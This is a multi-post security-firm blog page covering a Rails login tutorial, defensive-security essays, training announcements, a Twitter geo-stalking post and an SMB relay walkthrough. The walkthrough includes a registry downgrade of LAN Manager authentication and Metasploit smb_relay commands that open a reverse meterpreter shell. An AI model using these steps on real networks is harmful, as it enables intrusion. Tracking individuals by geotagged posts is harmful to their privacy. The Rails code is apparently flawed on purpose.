Monday, December 31, 2012

Basics of Rails Part 5


If you'd like to skip coding this up or are having issues, you can find the application source code here.

To start at the code which represents the completion of Parts 1-5, do the following:

$ git clone git://github.com/cktricky/attackresearch.git

$ cd attackresearch/

$ git reset --hard 3c3003d0b087d64f60446f74bcb2deedca60691f

$ bundle install

$ rake db:create db:migrate unicorn:start[4444]

=========== Part 5 Code and Walkthrough ==============

The first thing we need to do in this post is correct a mistake in the last post.

Type the following to change the model "Users" to its singular form "User". If you don't, it will cause problems with Rails routing.

$ rails d model Users

$ rails g model User first_name:string last_name:string email:string password_hash:string password_salt:string admin:boolean

$ rake db:drop

$ rake db:create

$ rvmsudo rake db:migrate


Also, a small but important detail: please ensure that within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0' 

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'


Now... back to the series. We last left off with a login page that was visible when browsing to your site but didn't really do anything. Time to rectify that.

Within the Sessions controller, a create method was defined and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt_password method and call it using the "before_save" Rails callback. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:

me = User.new
me.email = "test@ar.com"
me.password = "test"
me.password_confirmation = "test"
me.save <~ at this point, any "before_save" methods get called

So when you see something like user = User.new and user.save you know that the encrypt_password method will be called by Rails prior to saving the user data because of the "before_save" definition on line 4.


Now we have to add a few more things:

attr_accessor :password

validates_confirmation_of :password
validates_presence_of :password, :on => :create
validates_presence_of :email
validates_uniqueness_of :email

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception is "attr_accessor", which is standard Ruby and creates both a getter and a setter for the attribute.

Okay, now let's see what it looks like.
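
If you're following along without the screenshots, /app/models/user.rb should end up looking something like this sketch (laid out so the before_save call lands on line 4, as referenced above; details may differ from the original):

class User < ActiveRecord::Base
  attr_accessor :password

  before_save :encrypt_password

  validates_confirmation_of :password
  validates_presence_of :password, :on => :create
  validates_presence_of :email
  validates_uniqueness_of :email

  # Returns the user if the email/password combination checks out, nil otherwise
  def self.authenticate(email, password)
    user = find_by_email(email)
    if user && user.password_hash == BCrypt::Engine.hash_secret(password, user.password_salt)
      user
    else
      nil
    end
  end

  # Called by the before_save hook above
  def encrypt_password
    if password.present?
      self.password_salt = BCrypt::Engine.generate_salt
      self.password_hash = BCrypt::Engine.hash_secret(password, password_salt)
    end
  end
end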


Alright, so now we have a login page that does something, but we need to create users. For this application's purpose, we are going to allow users to sign up. Let's provide a link for this purpose on the login page and, even further, let's create a navigation bar at the top. We want this navigation bar visible on every page the user visits. The easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (the navigation bar, for example).


Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter-Bootstrap, one important thing to note is that the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter-Bootstrap-defined style.

The logic portion, the portion that belongs to Ruby and Rails, is lines 13-18. Effectively, we are asking whether the user visiting the page (current_user) is authenticated (exists). If they are, show a link to the logout path; otherwise, render a login and a signup link.
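
The relevant portion of the layout might look something like this sketch (the surrounding Bootstrap markup is illustrative; only the if/else logic is essential):

<div class="navbar navbar-fixed-top">
  <div class="navbar-inner">
    <div class="container">
      <ul class="nav">
        <% if current_user %>
          <li><%= link_to "Logout", logout_path %></li>
        <% else %>
          <li><%= link_to "Login", login_path %></li>
          <li><%= link_to "Signup", signup_path %></li>
        <% end %>
      </ul>
    </div>
  </div>
</div>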

You are probably wondering where link_to and current_user come from. Rails provides built-in methods, and you'll notice, in the views, they are typically placed between <%= and %>. So, link_to is a built-in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

Located at /app/controllers/application_controller.rb
Notice on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the view, we have annotated it as a helper_method on line 4.
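
A sketch of that controller (arranged so helper_method falls on line 4 and current_user on line 8):

class ApplicationController < ActionController::Base
  protect_from_forgery

  helper_method :current_user

  private

  def current_user
    @current_user ||= User.find(session[:user_id]) if session[:user_id]
  end
end

The ||= memoizes the lookup, so we only query the database once per request.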

The next thing we need to do now is actually make the signup page. First, let's modify the attributes that are mass-assignable via attr_accessible in the user model file.
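
Something along these lines (the exact list just needs to cover the fields a user can set at signup):

attr_accessible :first_name, :last_name, :email, :password, :password_confirmation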



Next, review the users_controller.rb file and add the methods new & create. When new is called, we instantiate a new blank User object (@user). Under the create method, we build a new User from the parameters submitted by the user (email, password, password_confirmation) and save it to create the user.
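
A sketch of the resulting controller (the notice text is just an example):

class UsersController < ApplicationController
  def new
    @user = User.new
  end

  def create
    @user = User.new(params[:user])
    if @user.save
      redirect_to root_url, :notice => "Signed up!"
    else
      render "new"
    end
  end
end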



Explanation of the Intended Flow - 

  • User clicks "signup" and is sent to /signup (GET request). 
  • User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb. 
  • Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users. 
  • The POST request to /users translates to the "create" action within the "user" controller. 


Now, obviously we are missing something... we need a signup page! Let's code that up in new.html.erb.


/app/views/users/new.html.erb
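
A sketch of what this view might contain (using form_for so the parameter names come out as user[...]):

<h1>Sign Up</h1>

<%= form_for @user do |f| %>
  <%= f.label :email %>
  <%= f.text_field :email %>

  <%= f.label :password %>
  <%= f.password_field :password %>

  <%= f.label :password_confirmation %>
  <%= f.password_field :password_confirmation %>

  <%= f.submit "Sign Up", :class => "btn btn-primary" %>
<% end %>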

The internals of Rails and how we are able to treat @user as an enumerable object and create label tags and text field tags might be a little too complicated for this post. That being said, basically, the @user object (defined in the Users controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look something like user[email] and user[password_confirmation], for example. Here is what the actual request looks like in Burp...


Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so now we have registered a user. The last piece here is to have a home page to view after successful authentication and also to code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path. We also create a destroy method, which calls the Rails method "reset_session" and redirects the user back to the root_url. Finally, remove the content within the index action under the home controller.

Okay, here is what I mean...

Session Controller - Note the change on line 9 and the additions on lines 16-19.
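
If you're working without the screenshots, the controller should now look something like this (laid out so line 9 and lines 16-19 line up with the note above; the flash wording is just an example):

class SessionsController < ApplicationController
  def new
  end

  def create
    user = User.authenticate(params[:email], params[:password])
    if user
      session[:user_id] = user.id
      redirect_to home_index_path
    else
      flash.now.alert = "Invalid email or password"
      render "new"
    end
  end

  def destroy
    reset_session
    redirect_to root_url
  end
end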

Home Controller - Note that the code contained within the index action has been removed.
You should be able to complete the authentication flow now! Stay tuned for Part 6.

Note: If you see any security holes in some of the code shown in this series please remember that's kind of the point and refrain from commenting until later.

cktricky

Wednesday, December 12, 2012

Your Soldiers are Untrained


People often try to draw analogies between computer security and the military or warfare. Let's put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?" The answer, I believe, is training, drilling and exercising. They don't spend the vast majority of their time in heated battle. In fact, only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not, do they spend most of their time training, exercising and practising for future incidents? If not, why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that, much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary, much like the Air Force Aggressor Squadrons.

From wikipedia: "Aggressor squadrons use enemy tactics, techniques, and procedures to give a realistic simulation of air combat (as opposed to training against one's own forces)." (http://en.wikipedia.org/wiki/Aggressor_squadron)

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits, and real attackers do not. Attackers use 0days, complex configuration/design issues, or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best way to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc. This sort of ongoing training is more expensive than penetration testing, for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:
Adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to mimic a specific attacker's behaviour, such as a beacon using a non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins a lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive, in CD-sized chunks, using a non-English language version of WinRAR and a password captured from an incident response event. The team searches out, identifies, and compromises systems, users, and data of interest. Each drill may have a different target, such as PCI data, engineering-related intellectual property, or executive communications.

Day 4:

Finally, the team exfiltrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise.  The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc.  Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter, if not once a month, then your soldiers are untrained and likely to get slaughtered when it's time for the real battle.


V.
valsmith

Wednesday, December 5, 2012

On Sophistication


Having played both the attacker and defender role for many years, something I have often seen, and even done myself, is make statements and assumptions about the "sophistication" of my adversary.

Often when some big hack occurs, blogs, media stories and quotes from experts will espouse opinions that "the attacker was not very sophisticated" or "it was an extremely sophisticated attack". I believe that oftentimes, and I myself have been guilty of this, these assertions are the result of a wrong-headed analysis and a misunderstanding of what sophistication means in the context of computer attacks.

An example will help illustrate the point. I have heard Stuxnet labeled both sophisticated and unsophisticated. One might be tempted to point to the inclusion of 4 0days as proof that highly skilled attackers launched this attack. Well, 0days can be bought. Others might say: well, the way it was caught and the fact that it could infect more than its presumed target means the attackers weren't very good. Even the most well developed attacks get caught eventually. (See the device the Russians implanted in the Great Seal 60 years ago.)

A truly sophisticated attacker will use only what is necessary and cost effective to achieve their goals and no more. An even better attacker will attempt to convince you they are not very good and waste as much of your time as possible while still achieving the goal.

I would put forth the idea that the determination of sophistication be based on the following:

Did the attacker achieve their goals?

Let us assume further that these goals consist of:

1.) Gaining unauthorized access to one or more of your systems

If they achieve #1 then they have already proven to be more sophisticated than your first line of defensive/prevention systems as well as your user awareness and training program. To speak of the attacker as unsophisticated because they used an automated SQL injection tool or a basic phishing email is silly, because you have no idea how good they are based solely on the penetration mechanism, and they are already more sophisticated than your ability to stop them.

2.) Evasion of detection, at least for the period of time required to complete some goals

If they have a shell on one of your systems, and nothing detects, alerts or responds, then the attacker is more sophisticated than your SIM implementation, IDS and first-line analysts, at least from the standpoint of detection during the initial attack. The fact that they used XOR vs full SSL to protect network communications from detection is irrelevant and gives you no clue as to how good they are.

3.) Access to and/or exfiltration of sensitive data

If the attacker has been able to take the data they are targeting then they have overcome your internal controls, ACLs and data protection. It matters not if they used a zip file or steganography to package the data.

4.) Persistence

If the attacker can persist with unauthorized access on your system for any period of time then they have outsmarted your defensive team, your secure configuration management and basically all your defenses. It doesn't matter if their method of persistence is a simple userland executable launched from the Run key in the registry or a highly stealthy kernel driver, they won that round.

5.) Effect

If they can cause a real-world effect such as blowing up your centrifuges, gaining a competitive advantage, or spending your money, then that is the final nail in your coffin. They are more sophisticated than you are, regardless of what type of exploit they used, whether it was a 10-year-old Perl CGI bug or one that uses memory tai chi to elegantly overcome Windows 7 buffer overflow protections.

Let's think about this for a minute. Think of all the money, time, resources and personnel you have expended on perimeter defense, detection and alerting, and analytical teams. Think of the work involved at the vendors who have developed all of the products and appliances you have purchased. The PhDs at AV vendors designing heuristics, the smart guys and girls developing exploits and signatures at your favorite IDS company. The awesome hax0rs at the pen test company you just hired. The often millions of dollars spent on defense.

All of this and the attacker has subverted it, maybe with a month of work, maybe less, and considerably less funding in most cases. So who is the sophisticated one?

The only place you might have won is in the forensics post-event department, usually the least funded and most resource-starved component of your program. This is usually where the determination is made that the attacker was not very sophisticated, because it was possible to reverse engineer the attack and understand the tools and techniques used. That's great, but just because you can understand that an assassin used a rock to kill a VIP doesn't mean the assassin sucks if they got away from the highly skilled protection detail, the target is dead, and their identity remains unknown.

So pause for a moment before you label an attacker unsophisticated or a script kiddie. Ask yourself, did they achieve the above mentioned goals? If so, then they outsmarted you.

V.
valsmith

Friday, November 16, 2012

Windows 7 and SMB Relay


Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation.  Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn’t stop you from being able to replay the hash to another host and get a shell – at least, it doesn’t stop you as long as the host isn't speaking NTLMv2! By default, Vista and up send NTLMv2 responses only for the LAN Manager authentication level.  This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, the LAN Manager authentication settings honor it.  This happens on the fly; there are no reboots, logons/logoffs, etc. There is a caveat with this! You have to have administrator privileges on the first host!  This scenario is about tactically exploiting networks and doing things the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.
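
Something along these lines (LmCompatibilityLevel is the value that controls the LAN Manager authentication level; this is a sketch of the file):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000000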

This registry key is targeting the following path:  HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set to as low as it will go, we can capitalize on this.


Open a Metasploit console (you will need admin privileges) on the host that will be set up as the bounce-through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The settings would look something like this:
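
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(smb_relay) > set LHOST 192.168.0.15
msf exploit(smb_relay) > set SMBHOST 192.168.0.13
msf exploit(smb_relay) > exploit

Here, SMBHOST is the end host we relay to (192.168.0.13) and LHOST is where the meterpreter payload will connect back; your exact options may vary.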

Once all your settings are selected, exploit and get ready for the hard part.  We need to get this account to attempt authentication to our bounce-through host using LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\share).  Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching in the class, but we have used this tactic, coupled with a few others, to compromise almost an entire Windows domain.

For brevity’s sake, we will just go ahead and simulate this activity by typing the following in the run dialogue box on the first victim host (192.168.0.14):  \\192.168.0.15\share\image.jpg

I am not really hosting anything as a share on my host; I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This authentication attempt actually happens even by just typing \\192.168.0.15.  With just the IP address entered, you will see authentication attempts to your host, but for large-scale attacks, or something along those lines, it is best to have a full UNC path.   Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative.  Type sessions -l in your Metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.

This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques class is based on showing people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures.  Offensive Techniques has various sections covering techniques we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.

The goal of our training is to get students out of the mindset of traditional pen testing and show them how real offensive attacks actually happen.  We are hoping these types of concepts spread to the whole industry.  When this happens, we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape.  If you are interested in the training we released yesterday or have questions, please visit our site or email us at training@attackresearch.com.

R.


Anonymous

Thursday, November 15, 2012

Attack Research Training Release


All too often, we at Attack Research have found that students are not being taught, or are not allowed, to properly perform real-world scenarios. For example, they want to run vulnerability scanners on penetration tests! When we say they are not allowed to perform real-world scenarios, some would say it’s the government or the company that doesn't want the real-world scenario. This might be very true, but those governments and companies received the understanding somewhere that running vulnerability scanners on a penetration test was a good idea, and this understanding came through some form of education. Think of network security back in the late 90's to early 2000's: Real-world attacks really did combine scanning for a vulnerability and then exploiting it. Sasser came along and changed the game, and we then had firewalls, improvements in host configurations, etc. In the early 2000's, we started to see what we currently recognize as training in the industry. This training was based upon the attacks in that time period. Well, the evolution of attack has changed, and so has the defense.

Don't get me wrong; the training industry has also evolved, but not at the rate it did when it first started back in the late 90's and 2000's. Back then, there really wasn't a standard for delivering attack-based training. We have certainly had our fair share of standards since then, but when there is no set standard, it is easier to create a new one than it is to change the current one. Well, it’s time to change that!

Classes at Attack Research are designed to help students with real-world problems. We hope to work at a grass roots level and a management level to change the way governments and companies approach network security. This is why our classes are designed to teach technical-level, real-world content. Not only from an offensive perspective but a defensive one as well.  Students will come out of our classes ready to use the skills they learned. They will learn not only how a certain tool is used but the fundamentals behind it so that when they have differing results from the tools, they will know how to handle it or, better yet, they will not use the tool and write their own!

We are proud to announce that Attack Research will be at a number of conferences and locations in 2013. Last week, we announced our partnership with Trail of Bits to offer training in the New York City area in January, April, and June.

Along with our annual training at Black Hat Las Vegas, we have joined with Source Conference to provide training at all their conferences. At Source Boston, we will be offering a 2-day version of our Offensive Techniques training. We will also be at BruCON in September!

Attack Research can transport any of its classes around the world or at your own company. If you are interested in private trainings, please drop us a line at training@attackresearch.com

Starting in 2013, we will hold trainings at Attack Research headquarters in New Mexico, where we will be offering reduced rates for all classes. The majority of our classes will be offered at this location, and they are scheduled to begin January 29-30. We will debut our brand new class, Operational Post Exploitation. You can register for this class here.

Our list of available classes is:

Offensive Techniques – Offensive Techniques offers students the opportunity to learn real offensive cyber-operation techniques. The focus is on recon, target profiling and modeling, and exploitation of trust relationships. The class will teach students non-traditional methods that follow closely what advanced adversaries do, rather than compliance-based penetration testing, and will also teach students how to break into computers without using exploits.

Operational Post-Exploitation – This class explores what to do after a successful penetration into a target, including introducing vulnerabilities rather than back doors for persistence. Operational Post-Exploitation covers such techniques as data acquisition, persistence, stealth, and password management on many different operating systems and using several scenarios.

Rapid Reverse Engineering – Rapid Reverse Engineering is a must these days with APT-style attacks and advanced adversaries. This class combines deep reverse engineering subjects with basic rapid triage techniques to provide students with a broad capability when performing malware analysis. This course will take the student from 0 to 60, focusing on learning the tools and key techniques of the trade for rapidly reverse engineering files. Students will learn how to rapidly assess all types of files.

Attacking Windows – Attacking Windows is Attack Research’s unique approach to actually securing Windows. Students will become proficient in attacking Windows systems, learning the commands that are available to help move around systems and data, and examining and employing logging and detection. It will also cover authentication mechanisms, password storage and cracking, tokens, and the domain model. Once finished with this course, students will have a foundation on how attack models on Windows actually happen and how to secure against them.

Attacking Unix – Attacking Unix is Attack Research’s unique approach to actually securing Unix. Students will become proficient in attacking Unix systems, focusing mostly on Linux, Solaris and FreeBSD. SSH, Kerberos, kernel modules, file sharing, privilege escalation, home directories, and logging all will be covered in depth. Once finished with this course, students will have a foundation on how attack models on Unix actually happen and how to secure against them.


Web Exploitation – The web is one of the most prevalent vectors of choice when attacking targets because websites reside outside the firewall. Web Exploitation will teach the basics in SQL injection, CGI exploits, content management systems, PHP, ASP, and other back doors, as well as the mechanics of exploiting web servers.


MetaPhishing – MetaPhishing is a class designed to teach the black arts for targeted phishing operations, file format reverse engineering and infection, and non-attributable command and control systems. After completing this class, students will have a solid foundation for all phishing situations.

Basic Exploit Development – In order to use the tools, one must have an understanding of the basics of how they work. Basic Exploit Development will cover the step-by-step basics, tools, and methods for utilizing buffer/heap overflows on Windows and Unix.

Advanced Exploitation – Reliable exploitation on newer Windows systems requires advanced techniques such as heap layout manipulation, return oriented programming, and ASLR information leaks. In addition, robust exploitation necessitates repairing the heap and continuing execution without crashing the process. Advanced Exploitation focuses on teaching the principles behind these advanced techniques and gives the students hands-on experience developing real-world exploits.

This full listing is available on our website as well under the services/training section. Along with each class, there is a place to allow for notification of when the class will be offered next, either at Attack Research HQ or at a different location.

I will be releasing some example modules from some of our classes over the next few weeks so you can get a feel for what we are offering. If you have any questions, please don't hesitate to contact us at training@attackresearch.com




Anonymous

Tuesday, November 6, 2012

Geo-stalking with Bing Maps and the Twitter Maps App


Geo/Social stalking is fun.  Bing Maps has the ability to add various "apps" to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Map app, which lets you map geotagged tweets.

Let's start with somewhere fun, like the Pentagon, and see who's tweeting around there.


Once you have your places picked out, you can click on the Map Apps tab.



If you click on the Twitter Maps app, it loads recent geo-tagged tweets.


As you zoom in, you get a bit more detail.


You can also follow specific users and follow them around town :-)


thanks to indi303 for telling me about this

-CG
CG

Friday, November 2, 2012

Attack Research and Trail Of Bits Partnership



Earlier this week Trail Of Bits announced our partnership with them, offering trainings in New York City. We are very excited to team up with a great company, and to start delivering practical training in the NYC area. This is the first installment of our new training program, which is designed to provide good hands-on, knowledge-based training that practitioners can use right away.
We debuted our latest class, Offensive Techniques, at Countermeasure 2012 last week with incredible success. We will be offering Offensive Techniques in January with Trail Of Bits in NYC. In April, we will be releasing our new Rapid Reverse Engineering (RRE) class.  RRE is a practitioner-based training that is designed to give reverse engineers techniques that can be used instantly. The class is designed to help get answers from files very rapidly, which is useful in instances such as incident response. There will be a technical blog post soon with some example content from Offensive Techniques and Rapid Reverse Engineering. We are very happy to announce this partnership with Trail Of Bits.
We will be releasing a full catalog of our available classes next week! We also offer private trainings of our classes and have the capability to offer classes almost anywhere. If you are interested or have questions, email us at training@attackresearch.com
Anonymous

Thursday, November 1, 2012

The Biggest Problem in Computer Security


People tend to focus on various areas as being important for computer security such as memory corruption vulnerabilities, malware, anomaly detection, etc. However the lurking and most critical issue in my opinion is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site we find that we have to have the following skills:

1.) Soft skills (often the most important). The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer's staff, culture and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore; showing up with a blue mohawk, a spike in the forehead and leather pants, not being a team player, cussing, and surfing porn on the customer's systems doesn't cut it no matter how good you are technically. If you are that guy then you get to stay in the lab, and I guarantee you will make far less money, even if you can write ASLR bypass exploits and kernel rootkits.

2.) Documentation. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you can't clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, and laid out so that an executive can understand it and so that the other security firm the customer hires to validate your results doesn't make fun of you.

3.) The ability to mine disparate sets of data. This means taking in Apache logs, Windows event logs, proxy logs, and full packet captures. Handling, splitting and moving terabytes of data. Writing data mining code in sed/awk/bash/perl/python/ruby. Correlating events, cutting out desired fields, reassembling binary files from packets, etc. Using graph visualization packages to map out an intruder's connections on a network based on netflow data.

4.) Reverse engineering. This means disassembling binaries in IDA, running binaries in a debugger such as OllyDbg, WinDbg, or IDA, memory forensics, and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page checksumming? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5.) Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly and another dozen languages, at least well enough to look up APIs, understand standard libraries, and discover which imports are important.

6.) Operating systems. You should know the ins and outs, including file systems, memory management, the kernel, the library system and key command line tools, of at least half a dozen OSes, especially as they are used in enterprise environments. Domains, NFS, NIS, Kerberos, LDAP. So not only Windows, Linux and OS X, but also Solaris, AIX and some embedded or mobile systems.

7.) Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely and test in the customer's particular environment. You have to be able to take it apart, analyse the shellcode, understand everything it's doing and re-write your own version of it.

8.) Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum, enough technical base knowledge to use whatever tool is put in front of you. Examples include Wireshark, Splunk, FireEye, NetWitness, ArcSight, TippingPoint, Snort/Sourcefire, Blue Coat, Websense, TMI, and EnCase.

All of the members of your team, whether you are a consulting shop or an internal incident response team, need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics, but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist; they are unicorns. Those who can do this are either already employed, well paid and tackling more interesting problems than you can offer, or they are running/partners in their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and charging close to high-powered-lawyer hourly rates. (When people question rates I point out that big name IR shops are around $400/hr and even the Best Buy Geek Squad charges $120/hr to reload your OS.)

A lot of big contractors are trying to approach security like they did IT in the 90s and 00s. Bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a Windows server relatively quickly, the above list of skills takes a decade-plus to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above: 1.) Value freedom highly and don't want to work 9 to 5 in a cube farm, and 2.) Don't want to live or work long periods of time onsite where you are. They don't want to live in Houston or in Cleveland or in Indianapolis or probably even in the DC area. They want to live in La Jolla and San Francisco and New York, and someone, somewhere is willing to pay them a lot to do it, and probably do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java, and that's about it. You might luck out and get a good RIT, Georgia Tech, or New Mexico Tech student who knows more, but most likely they have already been recruited to the government or somewhere else. And the learning curve is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city, you will fail.

On the security company side you have the same problem: no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels), hire whatever they can find and field them. This continues the trend of mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying out is to focus on buying appliances and contracting professional services to set them up, hoping that automation can solve the problem. It cannot. Here is a perfect example: A customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out, and at first glance it looked very bad. It had all the classic signs of an exploit: heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular AutoCAD-type program generated legitimate PDFs that looked this way. This is something that is not automatable. You must have an experienced and skilled analyst to do this. No amount of rack-mount, fancy-logo appliances will help you. And the bigger your enterprise, the more you need. Every enterprise block of 30-50k IPs needs a team of 5-10 people.

Which leads me to the next issue: how you perceive your staffing resources. Example: One company I saw said they had a staff of 12 analysts to deal with security detection and response. I thought, wow, pretty good! Let's break the team down:


  • A manager, full time in meetings, paperwork, etc.
  • An assistant to the manager, secretarial work, etc.
  • 3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts
  • 5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis
  • 1 Developer mostly focused on designing queries and interfaces for the tools.
  • 1 Actual analyst. 

While management believes they have 12 people and doesn't understand why things take so long, they actually have 1 person. This situation is very common in big companies. 1 good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security.  What is the solution? Some would say training, but let's be honest: were you back home writing rootkits for work after taking Hoglund and Butler's class at Black Hat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2-day to 1-week course isn't doing it. Going through the entire SANS curriculum isn't doing it, and CISSP sure as hell isn't doing it.

You have to spend around 6 hours a day, after work, highly focused on coding, reversing, etc., for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big-name researchers and the best staff do it, and unfortunately you only need a couple of attackers for every 10 defenders out there.

V.
valsmith

Tuesday, October 30, 2012

Basics of Rails Part 4


In this portion of the series, we will create the foundation for a login page and deal a little bit more with the Model portion of MVC.

We need to be able to assign the following information to a user.
  • First Name
  • Last Name
  • Email Address
  • Password
  • Admin (true/false)
This is where the Model comes in. Before we jump into that, let's create a Users controller similar to the way we created a Home controller in the last post.
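
The generator command mirrors the one we used for the Home controller:

$ rails g controller Users new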

Note that the "new" following Users simply states that a "new" action (method) will be automatically defined in the controller for you. 
